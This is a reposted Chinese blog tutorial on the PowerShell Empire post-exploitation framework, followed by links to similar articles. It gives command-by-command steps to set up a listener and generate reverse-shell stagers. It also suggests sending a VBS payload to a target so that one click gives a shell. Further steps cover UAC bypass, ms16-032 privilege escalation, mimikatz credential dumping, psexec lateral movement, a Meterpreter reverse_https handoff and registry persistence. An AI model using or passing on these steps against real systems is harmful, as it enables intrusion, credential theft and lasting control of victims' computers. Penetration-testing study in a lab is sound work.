empire入门

最新推荐文章于 2024-06-23 22:00:04 发布
转载 最新推荐文章于 2024-06-23 22:00:04 发布 · 525 阅读 · 0 ·
CC 4.0 BY-SA版权
原文链接:https://yq.aliyun.com/articles/654369
文章标签:

#操作系统 #shell #git

参考文献:http://www.52bug.cn/%E9%BB%91%E5%AE%A2%E6%8A%80%E6%9C%AF/4158.html
http://www.freebuf.com/articles/network/175097.html
https://www.tuicool.com/articles/aQRJnqr
https://www.anquanke.com/post/id/87328
https://www.anquanke.com/post/id/87333

环境

ubuntu16.04
win10(所有防御都没关)

empire简介

Empire是一个针对windows平台的使用PowerShell脚本作为攻击载荷的渗透攻击框架,包括了从stager生成、提权到渗透维持的一系列功能。Empire实现了无需powershell.exe就可运行PowerShell代理的功能。

安装
git clone https://github.com/EmpireProject/Empire.git
cd Empire
cd setup
./install.sh 
./reset.sh
设置监听
lsof -i:80       //查看端口
./empire          //打开Empire工具
listeners        //建立一个监听
uselistener     //设置采用何种模式,空格加双击Tab键可以看到一共有9种模式
uselistener http   //设置http监听模式
set Name test     //设置相应参数
set Host xxx.xxx.xxx.xxx
execute   //运行
img_b9711466607e960532086835e4ed1cd0.png

img_2eca6adcd7471f1a6635b3d70ec6a237.png
生成木马

设置完监听,接着生成木马,输入usestager以后按下空格然后在按下tab键,可以看到总共是26个模块。其中multi为通用模块、osx为mac操作系统,还有linux与windows模块。 生成的文件类型有.dll,bat,vbs等。

1.launcher反弹shell代理

launcher python test

img_75fcf719f248ab46bf2710e330272b09.png

生成的内容直接贴到其他linux系统中 

launcher powershell test

img_75e6195f7c81030a0894be8f5c29afd1.png

生成的内容直接贴到其他windows系统中(Username带有*的是已提权成功的代理)
2.vbs反弹shell代理 

(Empire: listeners) > usestager windows/launcher_vbs
(Empire: stager/windows/launcher_vbs) > set Listener test
(Empire: stager/windows/launcher_vbs) > execute
img_5c9747e64451a861eb15e5557cc5eeea.png

生成的vbs文件可以通过xftp下载,并发给你的攻击目标,只要对方一点,就可以拿到目标的shell了

PS:其他的操作类似就不再一一记录了

连接代理及基本使用
agents                         //回连的靶机
interact UIK16xxx     //interact命令跟上刚刚上线的主机Name的名,交互
shell net user       //使用cmd命令的时候,要使用`shell+命令`的格式
list stale          //查看已丢失的代理
remove stale       //移除已丢失的代理
sc                //目标截图
Download         //下载文件
upload          //上传文件
img_50011ad815ac9fb3c3a2896021efba84.png
  • usemodule模块
(Empire: F76ADxxx) > usemodule
code_execution #代码执行
collection #信息收集模块、屏幕截图、键盘记录 、剪贴板记录等
credentials #密码凭据的获取和转储
exfiltration #指定ip进行端口扫描
lateral_movement #横向渗透模块
management #用来执行些系统设置,和邮件信息的收集
persistence #权限维持工具
privesc #权限提升
recon #侦察
situational_awareness #评估主机运行环境,网络运行环境
trollsploit #恶作剧
  • UAC提权模块
    这个需要给电脑上发文件,但是直接被查杀了
(Empire: agents) > interact A9U38xxx
(Empire: A9U38xxx) > usemodule privesc/bypassuac
(Empire: powershell/privesc/bypassuac) > set Listener test
(Empire: powershell/privesc/bypassuac) > execute
  • 使用Empire内置模块ms16-032提权
(Empire: A9U38xxx) > usemodule privesc/ms16-032
(Empire: powershell/privesc/ms16-032) > set Listener test
(Empire: powershell/privesc/ms16-032) > execute
  • 收集目标有用的信息
(Empire: A9U38xxx) > usemodule situational_awareness/host/winenum
(Empire: powershell/situational_awareness/host/winenum) > execute
  • mimikatz模块(只能在windows的环境上使用)
mimikatz   //需要对带有*的权限才能获取系统账号密码
creds      //查看所有hash值包括明文,数据库中写入的各类凭据
creds export /root/1.csv   //导出hash凭证到指定的路径的格式
  • AllChecks模块(检查提权方法)
(Empire: A9U38xxx) > usemodule privesc/powerup/allchecks
(Empire: powershell/privesc/powerup/allchecks) > execute
  • psexec模块横向生成一个反弹代理
(Empire: S4DU3VSRKR3U1DDF) > usemodule lateral_movement/invoke_psexec
(Empire: lateral_movement/invoke_psexec) > info
(Empire: lateral_movement/invoke_psexec) > set Listener test
(Empire: lateral_movement/invoke_psexec) > set ComputerName DESKTOP-14(`agents`命令下的`Username`的`\`前的名字)
(Empire: lateral_movement/invoke_psexec) > execute
Empire: lateral_movement/invoke_psexec) > agents
  • Empire和msf的联动
    利用Empire派生一个meterpreter的shell回来
    在msf下设置监听,通过https的方式反向连接。
use exploit/multi/handler
set payload windows/meterpreter/reverse_https
set lhost xxx.xxx.xxx.xxx
set lport 443
exploit
img_da7372ede4dcdac7eab1f53cd541c412.png
3.png

同样empire也建立个监听

(Empire: agents) > interact A9U38xxx
(Empire: A9U38xxx) > usemodule code_execution/invoke_shellcode
(Empire: powershell/code_execution/invoke_shellcode) > set Lport 443
(Empire: powershell/code_execution/invoke_shellcode) > set Lhost xxx.xxx.xxx.xxx
(Empire: powershell/code_execution/invoke_shellcode) > execute
  • 权限维持(registry)
(Empire: 3K5AExxx) > usemodule persistence/elevated/registry*
(Empire: powershell/persistence/elevated/registry) > set Listener test
(Empire: powershell/persistence/elevated/registry) > execute

在windows注册表regedit HKLM:SOFTWARE\Microsoft\Windows\CurrentVersion\Debug可以看到

empire3.6.1使用教程
weixin_45230825的博客
11-24 3134
empire使用 0 安装成功后在Empire文件夹中打开终端执行./empire 1.设置监听 输入 listeners 命令进入监听模块,输入 uselistener 加空格然后两下 tab 可列出所有的可使用监听类,选http 然后info就能查看监听的详细信息辣 最后设置好监听的Name(随便起)和Host(默认本机ip)和Port(80) 然后execute,就拿下了 在listeners 模块下通过 list 命令可查看已经设置的监听。 2.生成木马 设置好监听后通过 back 命令返回上一级
GraphQL入门
王和平的第三个果园
08-01 619
GraphQL是由Facebook创造的用于描述复杂数据模型的一种查询语言。这里查询语言所指的并不是常规意义上的类似sql语句的查询语言,而是一种用于前后端数据查询方式的规范。
Empire安装
wuxinweii的博客
11-04 3955
Empire 是一款类似Metasploit 的渗透测试框架,基于python 编写,Empire是一个纯粹的PowerShell 后开发代理,建立在密码安全通信和灵活的架构上。Empire 实现了无需powershell.exe 即可运行PowerShell 代理的功能,从键盘记录器到Mimikatz 等快速部署的后期开发模块,以及适应性通信以避开网络检测,所有这些都包含在以可用性为重点的框架中。 注:因为最近在研究内网建立后门,因为Empire可以不用power shell环境即可执行powerhell
Empire的安装与使用
npc88888的博客
03-21 1354
如:del test.txt删除文件,upload test.txt(文件要放在Empire目录下),cat test.txt 查看文件内容,sc截屏命令,截屏以后保存在显示的文件夹内。Usestager windows/launcher_bat 选择windows/launcher_bat模块。Back 退出监听器,list可以查看有多少个监听器,kill test 可以删除名为test的监听器。因为这个文件生成在empire容器内,是访问不到的,要把这个文件移动到~/var/www/html。
Empire基础使用
yyj1781572的博客
11-12 1156
Empire基础使用
Empire信息收集
weixin_46104215的博客
11-14 1445
Empire主要用于后渗透,所以信息收集是一个常用的模块,可以使用 search module 命令搜索需要使用的模块,键入 usemodule collection 然后空格(1)和Tab键(2)查看完整的列表 环境:目标主机 1.屏幕截图(不需要设置多余的参数) usemodule collection/screenshot info execute back 2.键盘记录 usemodule collection/keylogger execute 启动后开始记录目标主机.
Starkiller:Starkiller是PowerShell Empire的前端
03-20
入门 要运行Starkiller,可以在“页面上下载Mac,Linux和Windows的安装程序。有关在Linux上运行AppImage构建的更多信息, 也可以通过上的apt install starkiller获得Starkiller。 Kali版本比公开版本提前30天。 如果...
小学英语入门音标学习.doc
10-20
empire、inspire、respire中的ire,society、quiet中的ie。 15. 元音[au]:对应ou、ow。如house、noun、thousand中的ou,bow、town中的ow。 16. 长元音[ai]:对应uy、ie、i、ei、y。如buy、lie、pie中的uy,lie...
React项目快速入门与配置指南
#### 描述:Create React App入门 **知识点**: 1. **Create React App**:描述中提到的 "该项目是通过引导的" 暗示使用了Create React App(CRA),这是一个流行的React应用构建工具,能够快速搭建React项目的...
网络安全入门相关名称概念
最新发布
张有泽的博客
06-23 898
IPS是对防病毒软件和防火墙的补充,入侵预防系统是一部能够监视网络或网络设备的网络资料传输行为的计算机网络安全设备,能够即时的中断、调整或隔离一些不正常或是具有伤害性的网络资料传输行为。PKCS#7:定义一种通用的消息语法,包括数字签名和加密等用于增强的加密机制,PKCS#7与PEM兼容,所以不需其他密码操作,就可以将加密的消息转换成PEM消息。依照一定的安全策略,通过软件、硬件、对网络、系统的运行状况进行监视尽可能的发现各种攻击企图、攻击行为或者攻击结果,以保证网络系统资源的机密性、完整性和可用性。
PowerShell Empire实战入门
jennycisp的博客
10-30 592
PowerShsell Empire中文简称 “帝国” ,可能大多数只听说过这款内网渗透神器,针对windows系统平台而打造的一款渗透工具。在PowerShell方面,帝国实现了无需powershell.exe即可运行PowerShell代理的功能,可快速部署的开发后的模块从按键记录到Mimikatz,可逃避网络检测的能力,适应性强的通信,都包裹在易用性为重点的框架,有点类似于像meterpreter。Empire详情介绍参考官方网站:http://powershellempire.com/优快云大礼包
帝国Empire
MGwhhyq的博客
05-19 937
Empire是一款针对Windows平台的、使用Powershell脚本作为攻击载荷的渗透攻击框架工具,具有从stager生成、提权到渗透维持的一系列功能。Empire实现了无需powshell.exe就可运行Powershell代理的功能,还可以快速在后期部署漏洞利用模块,其内置模块有键盘记录、Mimikatz、绕过UAC、内网扫描等,使用能够躲避内网检测和大部分安全防护工具的查杀,简单来说就有点类似Metasploit,是一个基于PowerShell的远程控制木马。 Empire运行在linux平台上
Empire安装和试用
10-12 827
Empire2.0,powershell后渗透利器的安装和试用 https://www.restkhz.com/2017/05/empire-test/ 使用Empire“探索”Windows个人电脑 http://www.freebuf.com/articles/system/133135.html 转载于:https://www.cnblogs.com/xiaozi/p/76...
python渗透测试神器_后渗透测试神器Empire 3.0发布
weixin_39907658的博客
12-10 137
原标题:后渗透测试神器Empire 3.0发布经历漫长的等待后,后渗透测试神器 Empire 终于迎来了多项重大功能升级的 3.0 版本(https://github.com/BC-SECURITY/Empire/)。 Empire 是一款类似 Metasploit 的 PowerShell 可视化后期渗透测试框架,建立在密码安全通信和灵活的架构上。Empire 实现了无需 powershell....
Empire(一)基础使用
qq_56426046的博客
09-12 1374
后渗透框架 这个框架渗透内网渗透,主要针对windows内网渗透,这个框架集合了很多powershell内网渗透脚本,它支持域内网渗透,宏钓鱼,内网横行扩展,权限维持,后门生成等。
后渗透测试神器Empire的详解
热门推荐
Fly_鹏程万里
06-04 1万+
1. Empire简介官网介绍如下:Empire is a pure PowerShell post-exploitation agent built on cryptologically-secure communications and a flexible architecture. Empire implements the ability to run PowerShell agents...
后渗透神器Empire的简单使用
weixin_30279751的博客
03-16 1907
1、安装 1.1、系统环境: Debian系Linux:例如Ubuntu和Kali(本文使用Kali作为环境) 1.2、安装命令: 安装最后需要输入用户名、密码 wget https://raw.githubusercontent.com/backlion/demo/master/Empire-master.zip unzip Empire-master.zip cd Empire-m...
Empire安装,基本介绍,命令使用,监听(一)
single_g_l的博客
03-12 5243
目录 一.​Empire介绍 二. 安装Empire 1.命令安装 2.Git安装 3.Docker安装 三. 基本使用 1. Empire拥有客户端和服务端 2. 客户端操作 1) 基础命令 2)监听器 四. Empire 基础详解(模块,命令) 1.empire 相关命令 2. interact 命令 3. uselistener 监听模块 4. usestager模块(payload) 5. usemodule privesc 提权模块 6.PowerBr...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值